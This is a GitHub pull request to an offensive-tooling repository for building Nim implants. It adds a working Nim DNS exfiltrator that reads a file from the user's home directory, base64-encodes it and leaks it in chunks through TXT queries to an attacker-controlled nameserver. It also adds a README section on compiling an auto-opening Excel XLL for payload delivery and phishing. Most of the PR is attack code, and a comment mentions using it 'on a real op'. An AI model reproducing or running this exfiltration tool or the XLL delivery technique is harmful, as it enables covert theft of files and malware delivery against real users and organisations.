### PR TITLE
DNS Exfiltrator & Note in README about creating XLLs

### DIFF
--- a/README.md
+++ b/README.md
@@ -194,6 +194,31 @@ To compile:
 nim c -d=mingw --app=lib --nomain --cpu=amd64 mynim.dll
 ```
 
+### Creating XLLs
+You can make an XLL (an Excel DLL, imagine that) with an auto open function that can be used for payload delivery. The following code creates a simple for an XLL that has an auto open function and all other boilerplate code needed to compile as a link library. The POC compiles as a DLL, you can then change the extension to .xll and it will open in Excel and run the payload when double clicked:
+
+```
+#[
+    Compile:
+        nim c -d=mingw --app=lib --nomain --cpu=amd64 nim_xll.nim
+        
+    Will compile as a DLL, you can then just change the extension to .xll
+]#
+
+import winim/lean
+
+proc xlAutoOpen() {.stdcall, exportc, dynlib.} =
+    MessageBox(0, "Hello, world !", "Nim is Powerful", 0)
+
+proc NimMain() {.cdecl, importc.}
+
+proc DllMain(hinstDLL: HINSTANCE, fdwReason: DWORD, lpvReserved: LPVOID) : BOOL {.stdcall, exportc, dynlib.} =
+  NimMain()
+
+  return true
+```
+
+There are many other sneaky things that can be done with XLLs. See [more examples of XLL tradecraft here](https://github.com/Octoberfest7/XLL_Phishing).
 
 ## Optimizing executables for size
 

--- a/README.md
+++ b/README.md
@@ -87,6 +87,9 @@ My experiments in weaponizing [Nim](https://nim-lang.org/) for implant developme
 | [list_remote_shares.nim](../master/src/list_remote_shares.nim) | Use NetShareEnum to list the share accessible by the current user |
 | [chrome_dump_bin.nim](../master/src/chrome_dump_bin.nim) | Read and decrypt cookies from Chrome's sqlite database|
 | [suspended_thread_injection.nim](../master/src/suspended_thread_injection.nim) | Shellcode execution via suspended thread injection |
+| [dns_exfiltrate.nim](../master/src/dns_exfiltrate.nim) | Simple DNS exfiltration via TXT record queries |
+
+
 ## Examples that are a WIP
 
 | File | Description |
@@ -335,3 +338,4 @@ var buf: array[5, byte] = [byte 0xfc,0x48,0x81,0xe4,0xf0,0xff]
 - [@frknayar](https://twitter.com/frknayar)
 - [@OffenseTeacher](https://twitter.com/OffenseTeacher)
 - [@fkadibs](https://twitter.com/fkadibs)
+- [@HuskyHacksMK](https://twitter.com/HuskyHacksMK)

--- a/src/dns_exfiltrate.nim
+++ b/src/dns_exfiltrate.nim
@@ -1,0 +1,69 @@
+#[    
+
+    Copmpile:
+        nim c --d:mingw --d:debug --app=console main.nim
+
+
+    Author: HuskyHacks, Twitter: @HuskyHacksMK
+    License: BSD 3-Clause
+
+    Description: A simple DNS exfiltrator. Reads in the bytes of a specified file, converts them to URL safe b64, then makes TXT record queries to a specified DNS authoritative server.
+
+    Inspired by: https://github.com/samratashok/nishang/blob/master/Utility/Do-Exfiltration.ps1
+    Something like this:
+    ---
+        elseif ($ExfilOption -eq "DNS")
+        {
+            $code = Compress-Encode
+            $queries = [int]($code.Length/63)
+            while ($queries -ne 0)
+            {
+                $querystring = $code.Substring($lengthofsubstr,63)
+                Invoke-Expression "nslookup -querytype=txt $querystring.$DomainName $AuthNS"
+                $lengthofsubstr += 63
+                $queries -= 1
+            }
+            $mod = $code.Length%63
+            $query = $code.Substring($code.Length - $mod, $mod)
+            Invoke-Expression "nslookup -querytype=txt $query.$DomainName $AuthNS"
+    ---
+
+    You'll want a listening DNS server at the far end of this to catch the data as it traverses.
+
+    See the Sliver wiki page on DNS C2 for a quick guide on how to set up the required records to do this on a real op:
+        https://github.com/BishopFox/sliver/wiki/DNS-C2#setup
+
+]#
+
+import dnsclient
+import os
+from base64 import encode
+
+
+const CHUNK_SIZE = 62
+
+let homeDir = getHomeDir()
+var domain_name = ".yourdnsrecord.local"
+var auth_ns = "ns1.authdns.local"
+var target_file = homeDir & r"deathstar_engineering_docs.docx"
+
+proc dns_exfiltrate(ns: string, dom: string, target: string): void =
+    var content = readFile(target)
+    let b64 = encode(content, safe=true)
+
+    var stringindex = 0
+    while stringindex <= b64.len-1:
+        try:
+            var query =  b64[stringindex .. (if stringindex + CHUNK_SIZE - 1 > b64.len - 1: b64.len - 1 else: stringindex + CHUNK_SIZE - 1)]
+            let client = newDNSClient(ns)
+            var dnsquery = query & dom
+            # echo "[*] ", dnsquery
+            discard(client.sendQuery(dnsquery, TXT))
+            stringindex += CHUNK_SIZE
+            sleep(3000)
+        except:
+            discard
+
+
+when isMainModule:
+    dns_exfiltrate(authNS, domainName, target_file)

--- a/src/dns_exfiltrate.nim
+++ b/src/dns_exfiltrate.nim
@@ -1,13 +1,12 @@
 #[    
 
-    Copmpile:
-        nim c --d:mingw --d:debug --app=console main.nim
-
-
     Author: HuskyHacks, Twitter: @HuskyHacksMK
     License: BSD 3-Clause
 
     Description: A simple DNS exfiltrator. Reads in the bytes of a specified file, converts them to URL safe b64, then makes TXT record queries to a specified DNS authoritative server.
+
+    Copmpile:
+        nim c --d:mingw --d:debug --app=console dns_exfiltrate.nim
 
     Inspired by: https://github.com/samratashok/nishang/blob/master/Utility/Do-Exfiltration.ps1
     Something like this:
@@ -62,7 +61,8 @@ proc dns_exfiltrate(ns: string, dom: string, target: string): void =
             stringindex += CHUNK_SIZE
             sleep(3000)
         except:
-            discard
+            echo "[-] Something broke fam"
+            quit(1)
 
 
 when isMainModule:


### PR DESCRIPTION
Simple little POC for exfiltrating files via DNS TXT queries

The Kali host is set up to be the auth NS and the attacker DNS host for simplicity:

![image](https://user-images.githubusercontent.com/57866415/173401408-5518eac4-5e43-493d-9045-23ed1b9cc8b5.png)

![image](https://user-images.githubusercontent.com/57866415/173402123-f39df808-6e0c-48de-95f7-662fff839dbb.png)

Successful base64 exfiltration via TXT record queries for `deathstar_engineering_docs.docx`

![image](https://user-images.githubusercontent.com/57866415/173401749-9d18f4a3-7ac5-403c-9422-e7d711b2d922.png)
